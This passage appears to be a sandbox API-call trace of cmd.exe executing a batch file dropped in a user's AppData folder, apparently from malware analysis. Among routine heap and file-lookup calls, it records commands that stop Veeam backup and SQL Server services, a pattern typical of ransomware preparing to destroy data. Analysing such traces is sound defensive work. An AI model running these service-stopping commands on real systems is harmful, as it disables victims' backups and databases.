returned 11 [0219.523] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0219.523] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0219.523] _wcsicmp (_String1="net", _String2="REN") returned -4 [0219.523] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0219.523] _wcsicmp (_String1="net", _String2="SET") returned -5 [0219.523] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0219.523] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0219.523] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0219.523] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0219.523] _wcsicmp (_String1="net", _String2="MD") returned 1 [0219.523] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0219.523] _wcsicmp (_String1="net", _String2="RD") returned -4 [0219.523] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0219.523] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0219.523] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0219.523] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0219.523] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0219.523] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0219.523] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0219.523] _wcsicmp (_String1="net", _String2="VER") returned -8 [0219.523] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0219.524] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0219.524] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0219.524] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0219.524] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0219.524] _wcsicmp (_String1="net", _String2="START") returned -5 [0219.524] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0219.524] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0219.524] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0219.524] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0219.524] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0219.524] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0219.524] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0219.524] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0219.524] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0219.524] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0219.524] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0219.524] SetErrorMode (uMode=0x0) returned 0x1 [0219.524] GetProcessHeap () returned 0x3e0000 [0219.524] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x5c) returned 0x3f6cf0 [0219.524] GetProcessHeap () returned 0x3e0000 [0219.524] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x5c [0219.525] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0219.525] GetProcessHeap () returned 0x3e0000 [0219.525] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f4a80 [0219.525] GetProcessHeap () returned 0x3e0000 [0219.525] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6d58 [0219.525] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6d58, Size=0x122) returned 0x3f6d58 [0219.525] GetProcessHeap () returned 0x3e0000 [0219.525] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6d58) returned 0x122 [0219.525] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0219.525] GetProcessHeap () returned 0x3e0000 [0219.525] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f81f8 [0219.526] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f81f8, Size=0x76) returned 0x3f81f8 [0219.526] GetProcessHeap () returned 0x3e0000 [0219.526] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f81f8) returned 0x76 [0219.526] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0219.527] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0219.527] GetLastError () returned 0x2 [0219.527] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0219.527] GetLastError () returned 0x2 [0219.528] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0219.528] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0219.528] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0219.529] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0219.529] GetLastError () returned 0x2 [0219.529] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0219.529] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0219.530] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0219.530] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6e90, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0219.530] SetErrorMode (uMode=0x0) returned 0x1 [0219.530] GetProcessHeap () returned 0x3e0000 [0219.530] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x5c) returned 0x3f6e88 [0219.530] GetProcessHeap () returned 0x3e0000 [0219.530] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x5c [0219.531] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0219.531] GetProcessHeap () returned 0x3e0000 [0219.531] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6ef0 [0219.531] GetProcessHeap () returned 0x3e0000 [0219.531] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7018 [0219.531] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7018, Size=0x122) returned 0x3f7018 [0219.531] GetProcessHeap () returned 0x3e0000 [0219.531] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7018) returned 0x122 [0219.531] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0219.531] GetProcessHeap () returned 0x3e0000 [0219.531] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f7148 [0219.532] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7148, Size=0x76) returned 0x3f7148 [0219.532] GetProcessHeap () returned 0x3e0000 [0219.532] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7148) returned 0x76 [0219.532] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0219.532] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0219.533] GetLastError () returned 0x2 [0219.533] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0219.533] GetLastError () returned 0x2 [0219.534] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0219.534] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f3fd0 [0219.534] FindClose (in: hFindFile=0x3f3fd0 | out: hFindFile=0x3f3fd0) returned 1 [0219.534] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0219.535] GetLastError () returned 0x2 [0219.535] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f3fd0 [0219.535] FindClose (in: hFindFile=0x3f3fd0 | out: hFindFile=0x3f3fd0) returned 1 [0219.535] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0219.536] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0219.536] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0219.536] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0219.536] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0219.536] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop VeeamDeploySvc /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop VeeamDeploySvc /y", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="net stop VeeamDeploySvc /y", lpProcessInformation=0x3beae0*(hProcess=0x78, hThread=0x74, dwProcessId=0xa58, dwThreadId=0x8fc)) returned 1 [0219.540] CloseHandle (hObject=0x74) returned 1 [0219.540] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0219.540] GetProcessHeap () returned 0x3e0000 [0219.540] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0219.540] GetEnvironmentStringsW () returned 0x3f8408* [0219.540] GetProcessHeap () returned 0x3e0000 [0219.540] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0219.541] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0219.541] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0219.712] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x2) returned 1 [0219.712] CloseHandle (hObject=0x78) returned 1 [0219.712] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000002") returned 8 [0219.712] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0219.712] GetProcessHeap () returned 0x3e0000 [0219.712] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0219.712] GetEnvironmentStringsW () returned 0x3f8408* [0219.712] GetProcessHeap () returned 0x3e0000 [0219.712] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0219.712] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0219.712] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0219.713] GetProcessHeap () returned 0x3e0000 [0219.713] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0219.713] GetEnvironmentStringsW () returned 0x3f8408* [0219.713] GetProcessHeap () returned 0x3e0000 [0219.713] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0219.713] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0219.713] GetProcessHeap () returned 0x3e0000 [0219.713] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a70 | out: hHeap=0x3e0000) returned 1 [0219.713] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0219.713] _get_osfhandle (_FileHandle=1) returned 0x264 [0219.713] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0219.713] _get_osfhandle (_FileHandle=1) returned 0x264 [0219.713] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0219.713] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0219.713] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0219.714] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0219.714] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0219.714] SetConsoleInputExeNameW () returned 0x1 [0219.714] GetConsoleOutputCP () returned 0x1b5 [0219.714] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0219.714] SetThreadUILanguage (LangId=0x0) returned 0x409 [0219.714] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0219.714] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0219.714] _get_osfhandle (_FileHandle=3) returned 0x78 [0219.714] SetFilePointer (in: hFile=0x78, lDistanceToMove=6295, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1897 [0219.715] GetProcessHeap () returned 0x3e0000 [0219.715] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7148 | out: hHeap=0x3e0000) returned 1 [0219.715] GetProcessHeap () returned 0x3e0000 [0219.715] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7018 | out: hHeap=0x3e0000) returned 1 [0219.715] GetProcessHeap () returned 0x3e0000 [0219.715] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6ef0 | out: hHeap=0x3e0000) returned 1 [0219.715] GetProcessHeap () returned 0x3e0000 [0219.715] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0219.715] GetProcessHeap () returned 0x3e0000 [0219.715] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8278 | out: hHeap=0x3e0000) returned 1 [0219.715] GetProcessHeap () returned 0x3e0000 [0219.715] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4ba8 | out: hHeap=0x3e0000) returned 1 [0219.715] GetProcessHeap () returned 0x3e0000 [0219.715] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0219.715] GetProcessHeap () returned 0x3e0000 [0219.715] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d58 | out: hHeap=0x3e0000) returned 1 [0219.715] GetProcessHeap () returned 0x3e0000 [0219.715] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4a80 | out: hHeap=0x3e0000) returned 1 [0219.715] GetProcessHeap () returned 0x3e0000 [0219.715] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0219.715] GetProcessHeap () returned 0x3e0000 [0219.715] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0219.715] GetProcessHeap () returned 0x3e0000 [0219.715] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0219.715] GetProcessHeap () returned 0x3e0000 [0219.715] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3ffaf0 | out: hHeap=0x3e0000) returned 1 [0219.715] _get_osfhandle (_FileHandle=3) returned 0x78 [0219.715] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1897 [0219.715] ReadFile (in: hFile=0x78, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0x2a, lpOverlapped=0x0) returned 1 [0219.715] SetFilePointer (in: hFile=0x78, lDistanceToMove=6331, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x18bb [0219.715] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=36, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="net stop MSSQLServerOLAPService /y\r\n¥ /y\r\ny\r\n\r\n¥ /y\r\nures\r\nnded\r\n") returned 36 [0219.716] _get_osfhandle (_FileHandle=3) returned 0x78 [0219.716] GetFileType (hFile=0x78) returned 0x1 [0219.716] _get_osfhandle (_FileHandle=3) returned 0x78 [0219.716] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x18bb [0219.716] GetProcessHeap () returned 0x3e0000 [0219.716] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x400ad8 [0219.716] GetProcessHeap () returned 0x3e0000 [0219.716] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x400ad8 | out: hHeap=0x3e0000) returned 1 [0219.719] _tell (_FileHandle=3) returned 6331 [0219.720] _close (_FileHandle=3) returned 0 [0219.720] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0219.720] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0219.720] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0219.720] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0219.720] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0219.720] _wcsicmp (_String1="net", _String2="CD") returned 11 [0219.720] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0219.720] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0219.720] _wcsicmp (_String1="net", _String2="REN") returned -4 [0219.720] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0219.720] _wcsicmp (_String1="net", _String2="SET") returned -5 [0219.720] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0219.720] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0219.720] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0219.720] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0219.720] _wcsicmp (_String1="net", _String2="MD") returned 1 [0219.720] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0219.720] _wcsicmp (_String1="net", _String2="RD") returned -4 [0219.720] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0219.720] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0219.720] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0219.720] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0219.720] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0219.720] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0219.720] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0219.720] _wcsicmp (_String1="net", _String2="VER") returned -8 [0219.720] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0219.720] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0219.720] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0219.720] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0219.720] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0219.720] _wcsicmp (_String1="net", _String2="START") returned -5 [0219.720] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0219.720] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0219.720] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0219.721] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0219.721] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0219.721] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0219.721] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0219.721] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0219.721] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0219.721] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0219.721] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0219.721] SetErrorMode (uMode=0x0) returned 0x1 [0219.721] GetProcessHeap () returned 0x3e0000 [0219.721] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x5c) returned 0x3f6cf0 [0219.721] GetProcessHeap () returned 0x3e0000 [0219.721] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x5c [0219.722] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0219.722] GetProcessHeap () returned 0x3e0000 [0219.722] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f4a80 [0219.722] GetProcessHeap () returned 0x3e0000 [0219.722] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6d58 [0219.722] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6d58, Size=0x122) returned 0x3f6d58 [0219.722] GetProcessHeap () returned 0x3e0000 [0219.722] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6d58) returned 0x122 [0219.722] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0219.722] GetProcessHeap () returned 0x3e0000 [0219.722] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f81f8 [0219.723] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f81f8, Size=0x76) returned 0x3f81f8 [0219.723] GetProcessHeap () returned 0x3e0000 [0219.723] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f81f8) returned 0x76 [0219.723] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0219.723] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0219.724] GetLastError () returned 0x2 [0219.724] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0219.724] GetLastError () returned 0x2 [0219.724] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0219.725] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0219.725] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0219.725] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0219.726] GetLastError () returned 0x2 [0219.726] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0219.726] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0219.726] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0219.727] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6e90, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0219.727] SetErrorMode (uMode=0x0) returned 0x1 [0219.727] GetProcessHeap () returned 0x3e0000 [0219.727] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x5c) returned 0x3f6e88 [0219.727] GetProcessHeap () returned 0x3e0000 [0219.727] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x5c [0219.728] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0219.728] GetProcessHeap () returned 0x3e0000 [0219.728] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6ef0 [0219.728] GetProcessHeap () returned 0x3e0000 [0219.728] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7018 [0219.728] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7018, 